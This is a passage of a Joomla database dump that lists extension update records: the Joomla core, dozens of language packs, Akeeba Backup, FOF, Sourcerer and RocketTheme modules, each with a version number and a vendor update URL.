LU','','pkg_de-LU','package','',0,'3.9.15.1','','https://update.joomla.org/language/details3/de-LU_details.xml','',''),(10990,57,0,'English NZ','','pkg_en-NZ','package','',0,'3.9.15.1','','https://update.joomla.org/language/details3/en-NZ_details.xml','',''),(10991,57,0,'Kazakh','','pkg_kk-KZ','package','',0,'3.9.15.1','','https://update.joomla.org/language/details3/kk-KZ_details.xml','',''),(10992,67,0,'Akeeba Backup Core package','Akeeba Backup Core package','pkg_akeeba','package','',0,'7.0.1','','https://cdn.akeebabackup.com/updates/pkgakeebacore.xml','\n					https://www.akeebabackup.com/download/akeeba-backup/7-0-1.html\n				',''),(10993,76,0,'Akeeba Frontend Framework (FEF)','Akeeba Frontend Framework (FEF)','file_fef','file','',1,'1.0.10','','http://cdn.akeebabackup.com/updates/fef.xml','\n					https://www.akeebabackup.com/download/fef/1-0-10.html\n				',''),(10994,93,0,'Regular Labs - Sourcerer','','sourcerer','plugin','system',0,'8.2.0FREE','','https://download.regularlabs.com/updates.xml?e=sourcerer&type=.xml','https://www.regularlabs.com/extensions/sourcerer#download',''),(10995,101,0,'FOF 3.x Stable','FOF 3.x Stable','lib_fof30','library','',1,'3.5.1','','http://cdn.akeebabackup.com/updates/fof3_file.xml','\n					https://www.akeebabackup.com/download/fof3/3-5-1.html\n				',''),(10996,1,0,'Joomla','','joomla','file','',0,'3.9.15','','https://update.joomla.org/core/sts/extension_sts.xml','',''),(10997,3,0,'Romanian','','pkg_ro-RO','package','',0,'3.9.13.1','','https://update.joomla.org/language/details3/ro-RO_details.xml','',''),(10998,3,0,'Flemish','','pkg_nl-BE','package','',0,'3.9.15.1','','https://update.joomla.org/language/details3/nl-BE_details.xml','',''),(10999,3,0,'French','','pkg_fr-FR','package','',0,'3.9.15.1','','https://update.joomla.org/language/details3/fr-FR_details.xml','',''),(11000,3,0,'Georgian','','pkg_ka-GE','package','',0,'3.9.15.1','','https://update.joomla.org/language/details3/ka-GE_details.xml','',''),(11001,3,0,'Greek','','pkg_el-GR','package','',0,'3.9.15.1','','https://update.joomla.org/language/details3/el-GR_details.xml','',''),(11002,3,0,'Japanese','','pkg_ja-JP','package','',0,'3.9.15.1','','https://update.joomla.org/language/details3/ja-JP_details.xml','',''),(11003,3,0,'Hungarian','','pkg_hu-HU','package','',0,'3.9.12.1','','https://update.joomla.org/language/details3/hu-HU_details.xml','',''),(11004,3,0,'Afrikaans','','pkg_af-ZA','package','',0,'3.9.15.1','','https://update.joomla.org/language/details3/af-ZA_details.xml','',''),(11005,3,0,'Arabic Unitag','','pkg_ar-AA','package','',0,'3.9.15.1','','https://update.joomla.org/language/details3/ar-AA_details.xml','',''),(11006,3,0,'Catalan','','pkg_ca-ES','package','',0,'3.9.11.2','','https://update.joomla.org/language/details3/ca-ES_details.xml','',''),(11007,3,0,'Chinese Simplified','','pkg_zh-CN','package','',0,'3.9.15.1','','https://update.joomla.org/language/details3/zh-CN_details.xml','',''),(11008,3,0,'Croatian','','pkg_hr-HR','package','',0,'3.9.15.1','','https://update.joomla.org/language/details3/hr-HR_details.xml','',''),(11009,3,0,'Czech','','pkg_cs-CZ','package','',0,'3.9.13.1','','https://update.joomla.org/language/details3/cs-CZ_details.xml','',''),(11010,3,0,'Danish','','pkg_da-DK','package','',0,'3.9.15.1','','https://update.joomla.org/language/details3/da-DK_details.xml','',''),(11011,3,0,'Dutch','','pkg_nl-NL','package','',0,'3.9.15.1','','https://update.joomla.org/language/details3/nl-NL_details.xml','',''),(11012,3,0,'Estonian','','pkg_et-EE','package','',0,'3.9.14.2','','https://update.joomla.org/language/details3/et-EE_details.xml','',''),(11013,3,0,'Italian','','pkg_it-IT','package','',0,'3.9.15.1','','https://update.joomla.org/language/details3/it-IT_details.xml','',''),(11014,3,0,'Lithuanian','','pkg_lt-LT','package','',0,'3.9.6.1','','https://update.joomla.org/language/details3/lt-LT_details.xml','',''),(11015,3,0,'Persian','','pkg_fa-IR','package','',0,'3.9.15.1','','https://update.joomla.org/language/details3/fa-IR_details.xml','',''),(11016,3,0,'Polish','','pkg_pl-PL','package','',0,'3.9.13.1','','https://update.joomla.org/language/details3/pl-PL_details.xml','',''),(11017,3,0,'Portuguese','','pkg_pt-PT','package','',0,'3.9.15.1','','https://update.joomla.org/language/details3/pt-PT_details.xml','',''),(11018,3,0,'Russian','','pkg_ru-RU','package','',0,'3.9.12.1','','https://update.joomla.org/language/details3/ru-RU_details.xml','',''),(11019,3,0,'English AU','','pkg_en-AU','package','',0,'3.9.15.1','','https://update.joomla.org/language/details3/en-AU_details.xml','',''),(11020,3,0,'Slovak','','pkg_sk-SK','package','',0,'3.9.15.1','','https://update.joomla.org/language/details3/sk-SK_details.xml','',''),(11021,3,0,'English US','','pkg_en-US','package','',0,'3.9.15.1','','https://update.joomla.org/language/details3/en-US_details.xml','',''),(11022,3,0,'Swedish','','pkg_sv-SE','package','',0,'3.9.15.1','','https://update.joomla.org/language/details3/sv-SE_details.xml','',''),(11023,3,0,'Tamil','','pkg_ta-IN','package','',0,'3.9.15.1','','https://update.joomla.org/language/details3/ta-IN_details.xml','',''),(11024,3,0,'Thai','','pkg_th-TH','package','',0,'3.9.15.1','','https://update.joomla.org/language/details3/th-TH_details.xml','',''),(11025,3,0,'Uyghur','','pkg_ug-CN','package','',0,'3.7.5.2','','https://update.joomla.org/language/details3/ug-CN_details.xml','',''),(11026,3,0,'German DE','','pkg_de-DE','package','',0,'3.9.15.1','','https://update.joomla.org/language/details3/de-DE_details.xml','',''),(11027,3,0,'Portuguese Brazil','','pkg_pt-BR','package','',0,'3.9.15.1','','https://update.joomla.org/language/details3/pt-BR_details.xml','',''),(11028,3,0,'Serbian Latin','','pkg_sr-YU','package','',0,'3.9.15.1','','https://update.joomla.org/language/details3/sr-YU_details.xml','',''),(11029,3,0,'Spanish','','pkg_es-ES','package','',0,'3.9.11.1','','https://update.joomla.org/language/details3/es-ES_details.xml','',''),(11030,3,0,'Bosnian','','pkg_bs-BA','package','',0,'3.9.15.1','','https://update.joomla.org/language/details3/bs-BA_details.xml','',''),(11031,3,0,'Serbian Cyrillic','','pkg_sr-RS','package','',0,'3.9.15.1','','https://update.joomla.org/language/details3/sr-RS_details.xml','',''),(11032,3,0,'Finnish','','pkg_fi-FI','package','',0,'3.9.14.1','','https://update.joomla.org/language/details3/fi-FI_details.xml','',''),(11033,3,0,'Swahili','','pkg_sw-KE','package','',0,'3.9.15.1','','https://update.joomla.org/language/details3/sw-KE_details.xml','',''),(11034,3,0,'English CA','','pkg_en-CA','package','',0,'3.9.15.1','','https://update.joomla.org/language/details3/en-CA_details.xml','',''),(11035,3,0,'Welsh','','pkg_cy-GB','package','',0,'3.9.14.1','','https://update.joomla.org/language/details3/cy-GB_details.xml','',''),(11036,3,0,'Dari Persian','','pkg_prs-AF','package','',0,'3.4.4.3','','https://update.joomla.org/language/details3/prs-AF_details.xml','',''),(11037,3,0,'Slovenian','','pkg_sl-SI','package','',0,'3.9.15.1','','https://update.joomla.org/language/details3/sl-SI_details.xml','',''),(11038,3,0,'Spanish CO','','pkg_es-CO','package','',0,'3.9.15.1','','https://update.joomla.org/language/details3/es-CO_details.xml','',''),(11039,3,0,'German CH','','pkg_de-CH','package','',0,'3.9.15.1','','https://update.joomla.org/language/details3/de-CH_details.xml','',''),(11040,3,0,'German AT','','pkg_de-AT','package','',0,'3.9.15.1','','https://update.joomla.org/language/details3/de-AT_details.xml','',''),(11041,3,0,'German LI','','pkg_de-LI','package','',0,'3.9.15.1','','https://update.joomla.org/language/details3/de-LI_details.xml','',''),(11042,3,0,'German LU','','pkg_de-LU','package','',0,'3.9.15.1','','https://update.joomla.org/language/details3/de-LU_details.xml','',''),(11043,3,0,'English NZ','','pkg_en-NZ','package','',0,'3.9.15.1','','https://update.joomla.org/language/details3/en-NZ_details.xml','',''),(11044,3,0,'Kazakh','','pkg_kk-KZ','package','',0,'3.9.15.1','','https://update.joomla.org/language/details3/kk-KZ_details.xml','',''),(11045,20,0,'RokCommon Plugin','','','plugin','',0,'3.2.8','0802','http://updates.rockettheme.com/joomla/138/2084920890','',''),(11046,20,0,'RokGallery Extension','','mod_rokgallery','module','',0,'2.45','0802','http://updates.rockettheme.com/joomla/286/21ffe006','',''),(11047,20,0,'RokCommon Plugin','','','plugin','',0,'3.2.8','0802','http://updates.rockettheme.com/joomla/286/326466299','',''),(11048,20,0,'RokWeather','','','module','',0,'2.0.4','0802','http://updates.rockettheme.com/joomla/313/1307741342','',''),(11049,20,0,'RokMiniEvents','','','module','',0,'3.0.3','0802','http://updates.rockettheme.com/joomla/313/1301311221','',''),(11050,20,0,'RokCommon Plugin','','','plugin','',0,'3.2.8','0802','http://updates.rockettheme.com/joomla/381/337128173','',''),(11051,20,0,'RokCommon','','pkg_rokcommon','package','',0,'3.2.8','0802','http://updates.rockettheme.com/joomla/559/1033ef39','',''),(11052,57,0,'Romanian','','pkg_ro-RO','package','',0,'3.9.13.1','','https://update.joomla.org/language/details3/ro-RO_details.xml','',''),(11053,57,0,'Flemish','','pkg_nl-BE','package','',0,'3.9.15.1','','https://update.joomla.org/language/details3/nl-BE_details.xml','',''),(11054,57,0,'French','','pkg_fr-FR','package','',0,'3.9.15.1','','https://update.joomla.org/language/details3/fr-FR_details.xml','',''),(11055,57,0,'Georgian','','pkg_ka-GE','package','',0,'3.9.15.1','','https://update.joomla.org/language/details3/ka-GE_details.xml','',''),(11056,57,0,'Greek','','pkg_el-GR','package','',0,'3.9.15.1','','https://update.joomla.org/language/details3/el-GR_details.xml','',''),(11057,57,0,'Japanese','','pkg_ja-JP','package','',0,'3.9.15.1','','https://update.joomla.org/language/details3/ja-JP_details.xml','',''),(11058,57,0,'Hungarian','','pkg_hu-HU','package','',0,'3.9.12.1','','https://update.joomla.org/language/details3/hu-HU_details.xml','',''),(11059,57,0,'Afrikaans','','pkg_af-ZA','package','',0,'3.9.15.1','','https://update.joomla.org/language/details3/af-ZA_details.xml','',''),(11060,57,0,'Arabic Unitag','','pkg_ar-AA','package','',0,'3.9.15.1','','https://update.joomla.org/language/details3/ar-AA_details.xml','',''),(11061,57,0,'Catalan','','pkg_ca-ES','package','',0,'3.9.11.2','','https://update.joomla.org/language/details3/ca-ES_details.xml','',''),(11062,57,0,'Chinese Simplified','','pkg_zh-CN','package','',0,'3.9.15.1','','https://update.joomla.org/language/details3/zh-CN_details.xml','',''),(11063,57,0,'Croatian','','pkg_hr-HR','package','',0,'3.9.15.1','','https://update.joomla.org/language/details3/hr-HR_details.xml','',''),(11064,57,0,'Czech','','pkg_cs-CZ','package','',0,'3.9.13.1','','https://update.joomla.org/language/details3/cs-CZ_details.xml','',''),(11065,57,0,'Danish','','pkg_da-DK','package','',0,'3.9.15.1','','https://update.joomla.org/language/details3/da-DK_details.xml','',''),(11066,57,0,'Dutch','','pkg_nl-NL','package','',0,'3.9.15.1','','https://update.joomla.org/language/details3/nl-NL_details.xml','',''),(11067,57,0,'Estonian','','pkg_et-EE','package','',0,'3.9.14.2','','https://update.joomla.org/language/details3/et-EE_details.xml','',''),(11068,57,0,'Italian','','pkg_it-IT','package','',0,'3.9.15.1','','https://update.joomla.org/language/details3/it-IT_details.xml','',''),(11069,57,0,'Lithuanian','','pkg_lt-LT','package','',0,'3.9.6.1','','https://update.joomla.org/language/details3/lt-LT_details.xml','',''),(11070,57,0,'Persian','','pkg_fa-IR','package','',0,'3.9.15.1','','https://update.joomla.org/language/details3/fa-IR_details.xml','',''),(11071,57,0,'Polish','','pkg_pl-PL','package','',0,'3.9.13.1','','https://update.joomla.org/language/details3/pl-PL_details.xml','',''),(11072,57,0,'Portuguese','','pkg_pt-PT','package','',0,'3.9.15.1','','https://update.joomla.org/language/details3/pt-PT_details.xml','',''),(11073,57,0,'Russian','','pkg_ru-RU','package','',0,'3.9.12.1','','https://update.joomla.org/language/details3/ru-RU_details.xml','',''),(11074,57,0,'English AU','','pkg_en-AU','package','',0,'3.9.15.1','','https://update.joomla.org/language/details3/en-AU_details.xml','',''),(11075,57,0,'Slovak','','pkg_sk-SK','package','',0,'3.9.15.1','','https://update.joomla.org/language/details3/sk-SK_details.xml','',''),(11076,57,0,'English US','','pkg_en-US','package','',0,'3.9.15.1','','https://update.joomla.org/language/details3/en-US_details.xml','',''),(11077,57,0,'Swedish','','pkg_sv-SE','package','',0,'3.9.15.1','','https://update.joomla.org/language/details3/sv-SE_details.xml','',''),(11078,57,0,'Tamil','','pkg_ta-IN','package','',0,'3.9.15.1','','https://update.joomla.org/language/details3/ta-IN_details.xml','',''),(11079,57,0,'Thai','','pkg_th-TH','package','',0,'3.9.15.1','','https://update.joomla.org/language/details3/th-TH_details.xml','',''),(11080,57,0,'Uyghur','','pkg_ug-CN','package','',0,'3.7.5.2','','https://update.joomla.org/language/details3/ug-CN_details.xml','',''),(11081,57,0,'German DE','','pkg_de-DE','package','',0,'3.9.15.1','','https://update.joomla.org/language/details3/de-DE_details.xml','',''),(11082,57,0,'Portuguese Brazil','','pkg_pt-BR','package','',0,'3.9.15.1','','https://update.joomla.org/language/details3/pt-BR_details.xml','',''),(11083,57,0,'Serbian Latin','','pkg_sr-YU','package','',0,'3.9.15.1','','https://update.joomla.org/language/details3/sr-YU_details.xml','',''),(11084,57,0,'Spanish','','pkg_es-ES','package','',0,'3.9.11.1','','https://update.joomla.org/language/details3/es-ES_details.xml','',''),(11085,57,0,'Bosnian','','pkg_bs-BA','package','',0,'3.9.15.1','','https://update.joomla.org/language/details3/bs-BA_details.xml','',''),(11086,57,0,'Serbian Cyrillic','','pkg_sr-RS','package','',0,'3.9.15.1','','https://update.joomla.org/language/details3/sr-RS_details.xml','',''),(11087,57,0,'Finnish','','pkg_fi-FI','package','',0,'3.9.14.1','','https://update.joomla.org/language/details3/fi-FI_details.xml','',''),(11088,57,0,'Swahili','','pkg_sw-KE','package','',0,'3.9.15.1','','https://update.joomla.org/language/details3/sw-KE_details.xml','',''),(11089,57,0,'English CA','','pkg_en-CA','package','',0,'3.9.15.1','','https://update.joomla.org/language/details3/en-CA_details.xml','',''),(11090,57,0,'Welsh','','pkg_cy-GB','package','',0,'3.9.14.1','','https://update.joomla.org/language/details3/cy-GB_details.xml','',''),(11091,57,0,'Dari Persian','','pkg_prs-AF','package','',0,'3.4.4.3','','https://update.joomla.org/language/details3/prs-AF_details.xml','',''),(11092,57,0,'Slovenian','','pkg_sl-SI','package','',0,'3.9.15.1','','https://update.joomla.org/language/details3/sl-SI_details.xml','',''),(11093,57,0,'Spanish CO','','pkg_es-CO','package','',0,'3.9.15.1','','https://update.joomla.org/language/details3/es-CO_details.xml','',''),(11094,57,0,'German CH','','pkg_de-CH','package','',0,'3.9.15.1','','https://update.joomla.org/language/details3/de-CH_details.xml','',''),(11095,57,0,'German AT','','pkg_de-AT','package','',0,'3.9.15.1','','https://update.joomla.org/language/details3/de-AT_details.xml','',''),(11096,57,0,'German LI','','pkg_de-LI','package','',0,'3.9.15.1','','https://update.joomla.org/language/details3/de-LI_details.xml','',''),(11097,57,0,'German LU','','pkg_de-LU','package','',0,'3.9.15.1','','https://update.joomla.org/language/details3/de-LU_details.xml','',''),(11098,57,0,'English NZ','','pkg_en-NZ','package','',0,'3.9.15.1','','https://update.joomla.org/language/details3/en-NZ_details.xml','',''),(11099,57,0,'Kazakh','','pkg_kk-KZ','package','',0,'3.9.15.1','','https://update.joomla.org/language/details3/kk-KZ_details.xml','',''),(11100,67,0,'Akeeba Backup Core package','Akeeba Backup Core package','pkg_akeeba','package','',0,'7.0.1','','https://cdn.akeebabackup.com/updates/pkgakeebacore.xml','\n					https://www.akeebabackup.com/download/akeeba-backup/7-0-1.html\n				',''),(11101,76,0,'Akeeba Frontend Framework (FEF)','Akeeba Frontend Framework (FEF)','file_fef','file','',1,'1.0.10','','http://cdn.akeebabackup.com/updates/fef.xml','\n					https://www.akeebabackup.com/download/fef/1-0-10.html\n				',''),(11102,93,0,'Regular Labs - Sourcerer','','sourcerer','plugin','system',0,'8.2.0FREE','','https://download.regularlabs.com/updates.xml?e=sourcerer&type=.xml','https://www.regularlabs.com/extensions/sourcerer#download',''),(11103,101,0,'FOF 3.x Stable','FOF 3.x Stable','lib_fof30','library','',1,'3.5.1','','http://cdn.akeebabackup.com/updates/fof3_file.xml','\n					https://www.akeebabackup.com/download/fof3/3-5-1.html\n				',''),(11104,1,0,'Joomla','','joomla','file','',0,'3.9.15','','https://update.joomla.org/core/sts/extension_sts.xml','',''),(11105,1,0,'Joomla','','joomla','file','',0,'3.9.15','','https://update.joomla.org/core/sts/extension_sts.xml','',''),(11106,1,0,'Joomla','','joomla','file','',0,'3.9.15','','https://update.joomla.org/core/sts/extension_sts.xml','',''),(11107,67,0,'Akeeba Backup Core package','Akeeba Backup Core package','pkg_akeeba','package','',0,'7.0.2','','https://cdn.akeebabackup.com/updates/pkgakeebacore.xml','\n					https://www.akeebabackup.com/download/akeeba-backup/7-0-2.html\n				',''),(11108,1,0,'Joomla','','joomla','file','',0,'3.9.15','','https://update.joomla.org/core/sts/extension_sts.xml','',''),(11109,1,0,'Joomla','','joomla','file','',0,'3.9.15','','https://update.joomla.org/core/sts/extension_sts.xml','',''),(11110,1,0,'Joomla','','joomla','file','',0,'3.9.15','','https://update.joomla.org/core/sts/extension_sts.xml','',''),(11111,1,0,'Joomla','','joomla','file','',0,'3.9.15','','https://update.joomla.org/core/sts/extension_sts.xml','',''),(11112,67,0,'Akeeba Backup Core package','Akeeba Backup Core package','pkg_akeeba','package','',0,'7.0.2','','https://cdn.akeebabackup.com/updates/pkgakeebacore.xml','\n					https://www.akeebabackup.com/download/akeeba-backup/7-0-2.html\n				',''),(11113,1,0,'Joomla','','joomla','file','',0,'3.9.15','','https://update.joomla.org/core/sts/extension_sts.xml','',''),(11114,1,0,'Joomla','','joomla','file','',0,'3.9.15','','https://update.joomla.org/core/sts/extension_sts.xml','',''),(11115,1,0,'Joomla','','joomla','file','',0,'3.9.15','','https://update.joomla.org/core/sts/extension_sts.xml','',''),(11116,1,0,'Joomla','','joomla','file','',0,'3.9.15','','https://update.joomla.org/core/sts/extension_sts.xml','',''),(11117,3,0,'Romanian','','pkg_ro-RO','package','',0,'3.9.13.1','','https://update.joomla.org/language/details3/ro-RO_details.xml','',''),(11118,3,0,'Flemish','','pkg_nl-BE','package','',0,'3.9.15.1','','https://update.joomla.org/language/details3/nl-BE_details.xml','',''),(11119,3,0,'French','','pkg_fr-FR','package','',0,'3.9.15.1','','https://update.joomla.org/language/details3/fr-FR_details.xml','',''),(11120,3,0,'Georgian','','pkg_ka-GE','package','',0,'3.9.15.1','','https://update.joomla.org/language/details3/ka-GE_details.xml','',''),(11121,3,0,'Greek','','pkg_el-GR','package','',0,'3.9.15.1','','https://update.joomla.org/language/details3/el-GR_details.xml','',''),(11122,3,0,'Japanese','','pkg_ja-JP','package','',0,'3.9.15.1','','https://update.joomla.org/language/details3/ja-JP_details.xml','',''),(11123,3,0,'Hungarian','','pkg_hu-HU','package','',0,'3.9.12.1','','https://update.joomla.org/language/details3/hu-HU_details.xml','',''),(11124,3,0,'Afrikaans','','pkg_af-ZA','package','',0,'3.9.15.1','','https://update.joomla.org/language/details3/af-ZA_details.xml','',''),(11125,3,0,'Arabic Unitag','','pkg_ar-AA','package','',0,'3.9.15.1','','https://update.joomla.org/language/details3/ar-AA_details.xml','',''),(11126,3,0,'Catalan','','pkg_ca-ES','package','',0,'3.9.11.2','','https://update.joomla.org/language/details3/ca-ES_details.xml','',''),(11127,3,0,'Chinese Simplified','','pkg_zh-CN','package','',0,'3.9.15.1','','https://update.joomla.org/language/details3/zh-CN_details.xml','',''),(11128,3,0,'Croatian','','pkg_hr-HR','package','',0,'3.9.15.1','','https://update.joomla.org/language/details3/hr-HR_details.xml','',''),(11129,3,0,'Czech','','pkg_cs-CZ','package','',0,'3.9.13.1','','https://update.joomla.org/language/details3/cs-CZ_details.xml','',''),(11130,3,0,'Danish','','pkg_da-DK','package','',0,'3.9.15.1','','https://update.joomla.org/language/details3/da-DK_details.xml','',''),(11131,3,0,'Dutch','','pkg_nl-NL','package','',0,'3.9.15.1','','https://update.joomla.org/language/details3/nl-NL_details.xml','',''),(11132,3,0,'Estonian','','pkg_et-EE','package','',0,'3.9.14.2','','https://update.joomla.org/language/details3/et-EE_details.xml','',''),(11133,3,0,'Italian','','pkg_it-IT','package','',0,'3.9.15.1','','https://update.joomla.org/language/details3/it-IT_details.xml','',''),(11134,3,0,'Lithuanian','','pkg_lt-LT','package','',0,'3.9.6.1','','https://update.joomla.org/language/details3/lt-LT_details.xml','',''),(11135,3,0,'Persian','','pkg_fa-IR','package','',0,'3.9.15.1','','https://update.joomla.org/language/details3/fa-IR_details.xml','',''),(11136,3,0,'Polish','','pkg_pl-PL','package','',0,'3.9.13.1','','https://update.joomla.org/language/details3/pl-PL_details.xml','',''),(11137,3,0,'Portuguese','','pkg_pt-PT','package','',0,'3.9.15.1','','https://update.joomla.org/language/details3/pt-PT_details.xml','',''),(11138,3,0,'Russian','','pkg_ru-RU','package','',0,'3.9.12.1','','https://update.joomla.org/language/details3/ru-RU_details.xml','',''),(11139,3,0,'English AU','','pkg_en-AU','package','',0,'3.9.15.1','','https://update.joomla.org/language/details3/en-AU_details.xml','',''),(11140,3,0,'Slovak','','pkg_sk-SK','package','',0,'3.9.15.1','','https://update.joomla.org/language/details3/sk-SK_details.xml','',''),(11141,3,0,'English US','','pkg_en-US','package','',0,'3.9.15.1','','https://update.joomla.org/language/details3/en-US_details.xml','',''),(11142,3,0,'Swedish','','pkg_sv-SE','package','',0,'3.9.15.1','','https://update.joomla.org/language/details3/sv-SE_details.xml','',''),(11143,3,0,'Tamil','','pkg_ta-IN','package','',0,'3.9.15.1','','https://update.joomla.org/language/details3/ta-IN_details.xml','',''),(11144,3,0,'Thai','','pkg_th-TH','package','',0,'3.9.15.1','','https://update.joomla.org/language/details3/th-TH_details.xml','',''),(11145,3,0,'Uyghur','','pkg_ug-CN','package','',0,'3.7.5.2','','https://update.joomla.org/language/details3/ug-CN_details.xml','',''),(11146,3,0,'German DE','','pkg_de-DE','package','',0,'3.9.15.1','','https://update.joomla.org/language/details3/de-DE_details.xml','',''),(11147,3,0,'Portuguese Brazil','','pkg_pt-BR','package','',0,'3.9.15.1','','https://update.joomla.org/language/details3/pt-BR_details.xml','',''),(11148,3,0,'Serbian Latin','','pkg_sr-YU','package','',0,'3.9.15.1','','https://update.joomla.org/language/details3/sr-YU_details.xml','',''),(11149,3,0,'Spanish','','pkg_es-ES','package','',0,'3.9.11.1','','https://update.joomla.org/language/details3/es-ES_details.xml','',''),(11150,3,0,'Bosnian','','pkg_bs-BA','package','',0,'3.9.15.1','','https://update.joomla.org/language/details3/bs-BA_details.xml','',''),(11151,3,0,'Serbian Cyrillic','','pkg_sr-RS','package','',0,'3.9.15.1','','https://update.joomla.org/language/details3/sr-RS_details.xml','',''),(11152,3,0,'Finnish','','pkg_fi-FI','package','',0,'3.9.14.1','','https://update.joomla.org/language/details3/fi-FI_details.xml','',''),(11153,3,0,'Swahili','','pkg_sw-KE','package','',0,'3.9.15.1','','https://update.joomla.org/language/details3/sw-KE_details.xml','',''),(11154,3,0,'English CA','','pkg_en-CA','package','',0,'3.9.15.1','','https://update.joomla.org/language/details3/en-CA_details.xml','',''),(11155,3,0,'Welsh','','pkg_cy-GB','package','',0,'3.9.14.1','','https://update.joomla.org/language/details3/cy-GB_details.xml','',''),(11156,3,0,'Dari Persian','','pkg_prs-AF','package','',0,'3.4.4.3','','https://update.joomla.org/language/details3/prs-AF_details.xml','',''),(11157,3,0,'Slovenian','','pkg_sl-SI','package','',0,'3.9.15.1','','https://update.joomla.org/language/details3/sl-SI_details.xml','',''),(11158,3,0,'Spanish CO','','pkg_es-CO','package','',0,'3.9.15.1','','https://update.joomla.org/language/details3/es-CO_details.xml','',''),(11159,3,0,'German CH','','pkg_de-CH','package','',0,'3.9.15.1','','https://update.joomla.org/language/details3/de-CH_details.xml','',''),(11160,3,0,'German AT','','pkg_de-AT','package','',0,'3.9.15.1','','https://update.joomla.org/language/details3/de-AT_details.xml','',''),(11161,3,0,'German LI','','pkg_de-LI','package','',0,'3.9.15.1','','https://update.joomla.org/language/details3/de-LI_details.xml','',''),(11162,3,0,'German LU','','pkg_de-LU','package','',0,'3.9.15.1','','https://update.joomla.org/language/details3/de-LU_details.xml','',''),(11163,3,0,'English NZ','','pkg_en-NZ','package','',0,'3.9.15.1','','https://update.joomla.org/language/details3/en-NZ_details.xml','',''),(11164,3,0,'Kazakh','','pkg_kk-KZ','package','',0,'3.9.15.1','','https://update.joomla.org/language/details3/kk-KZ_details.xml','',''),(11165,20,0,'RokCommon Plugin','','','plugin','',0,'3.2.8','0802','http://updates.rockettheme.com/joomla/138/2084920890','',''),(11166,20,0,'RokGallery Extension','','mod_rokgallery','module','',0,'2.45','0802','http://updates.rockettheme.com/joomla/286/21ffe006','',''),(11167,20,0,'RokCommon Plugin','','','plugin','',0,'3.2.8','0802','http://updates.rockettheme.com/joomla/286/326466299','',''),(11168,20,0,'RokWeather','','','module','',0,'2.0.4','0802','http://updates.rockettheme.com/joomla/313/1307741342','',''),(11169,20,0,'RokMiniEvents','','','module','',0,'3.0.3','0802','http://updates.rockettheme.com/joomla/313/1301311221','',''),(11170,20,0,'RokCommon Plugin','','','plugin','',0,'3.2.8','0802','http://updates.rockettheme.com/joomla/381/337128173','',''),(11171,20,0,'RokCommon','','pkg_rokcommon','package','',0,'3.2.8','0802','http://updates.rockettheme.com/joomla/559/1033ef39','',''),(11172,57,0,'Romanian','','pkg_ro-RO','package','',0,'3.9.13.1','','https://update.joomla.org/language/details3/ro-RO_details.xml','',''),(11173,57,0,'Flemish','','pkg_nl-BE','package','',0,'3.9.15.1','','https://update.joomla.org/language/details3/nl-BE_details.xml','',''),(11174,57,0,'French','','pkg_fr-FR','package','',0,'3.9.15.1','','https://update.joomla.org/language/details3/fr-FR_details.xml','',''),(11175,57,0,'Georgian','','pkg_ka-GE','package','',0,'3.9.15.1','','https://update.joomla.org/language/details3/ka-GE_details.xml','',''),(11176,57,0,'Greek','','pkg_el-GR','package','',0,'3.9.15.1','','https://update.joomla.org/language/details3/el-GR_details.xml','',''),(11177,57,0,'Japanese','','pkg_ja-JP','package','',0,'3.9.15.1','','https://update.joomla.org/language/details3/ja-JP_details.xml','',''),(11178,57,0,'Hungarian','','pkg_hu-HU','package','',0,'3.9.12.1','','https://update.joomla.org/language/details3/hu-HU_details.xml','',''),(11179,57,0,'Afrikaans','','pkg_af-ZA','package','',0,'3.9.15.1','','https://update.joomla.org/language/details3/af-ZA_details.xml','',''),(11180,57,0,'Arabic Unitag','','pkg_ar-AA','package','',0,'3.9.15.1','','https://update.joomla.org/language/details3/ar-AA_details.xml','',''),(11181,57,0,'Catalan','','pkg_ca-ES','package','',0,'3.9.11.2','','https://update.joomla.org/language/details3/ca-ES_details.xml','',''),(11182,57,0,'Chinese Simplified','','pkg_zh-CN','package','',0,'3.9.15.1','','https://update.joomla.org/language/details3/zh-CN_details.xml','',''),(11183,57,0,'Croatian','','pkg_hr-HR','package','',0,'3.9.15.1','','https://update.joomla.org/language/details3/hr-HR_details.xml','',''),(11184,57,0,'Czech','','pkg_cs-CZ','package','',0,'3.9.13.1','','https://update.joomla.org/language/details3/cs-CZ_details.xml','',''),(11185,57,0,'Danish','','pkg_da-DK','package','',0,'3.9.15.1','','https://update.joomla.org/language/details3/da-DK_details.xml','',''),(11186,57,0,'Dutch','','pkg_nl-NL','package','',0,'3.9.15.1','','https://update.joomla.org/language/details3/nl-NL_details.xml','',''),(11187,57,0,'Estonian','','pkg_et-EE','package','',0,'3.9.14.2','','https://update.joomla.org/language/details3/et-EE_details.xml','',''),(11188,57,0,'Italian','','pkg_it-IT','package','',0,'3.9.15.1','','https://update.joomla.org/language/details3/it-IT_details.xml','',''),(11189,57,0,'Lithuanian','','pkg_lt-LT','package','',0,'3.9.6.1','','https://update.joomla.org/language/details3/lt-LT_details.xml','',''),(11190,57,0,'Persian','','pkg_fa-IR','package','',0,'3.9.15.1','','https://update.joomla.org/language/details3/fa-IR_details.xml','',''),(11191,57,0,'Polish','','pkg_pl-PL','package','',0,'3.9.13.1','','https://update.joomla.org/language/details3/pl-PL_details.xml','',''),(11192,57,0,'Portuguese','','pkg_pt-PT','package','',0,'3.9.15.1','','https://update.joomla.org/language/details3/pt-PT_details.xml','',''),(11193,57,0,'Russian','','pkg_ru-RU','package','',0,'3.9.12.1','','https://update.joomla.org/language/details3/ru-RU_details.xml','',''),(11194,57,0,'English AU','','pkg_en-AU','package','',0,'3.9.15.1','','https://update.joomla.org/language/details3/en-AU_details.xml','',''),(11195,57,0,'Slovak','','pkg_sk-SK','package','',0,'3.9.15.1','','https://update.joomla.org/language/details3/sk-SK_details.xml','',''),(11196,57,0,'English US','','pkg_en-US','package','',0,'3.9.15.1','','https://update.joomla.org/language/details3/en-US_details.xml','',''),(11197,57,0,'Swedish','','pkg_sv-SE','package','',0,'3.9.15.1','','https://update.joomla.org/language/details3/sv-SE_details.xml','',''),(11198,57,0,'Tamil','','pkg_ta-IN','package','',0,'3.9.15.1','','https://update.joomla.org/language/details3/ta-IN_details.xml','',''),(11199,57,0,'Thai','','pkg_th-TH','package','',0,'3.9.15.1','','https://update.joomla.org/language/details3/th-TH_details.xml','',''),(11200,57,0,'Uyghur','','pkg_ug-CN','package','',0,'3.7.5.2','','https://update.joomla.org/language/details3/ug-CN_details.xml','',''),(11201,57,0,'German DE','','pkg_de-DE','package','',0,'3.9.15.1','','https://update.joomla.org/language/details3/de-DE_details.xml','',''),(11202,57,0,'Portuguese 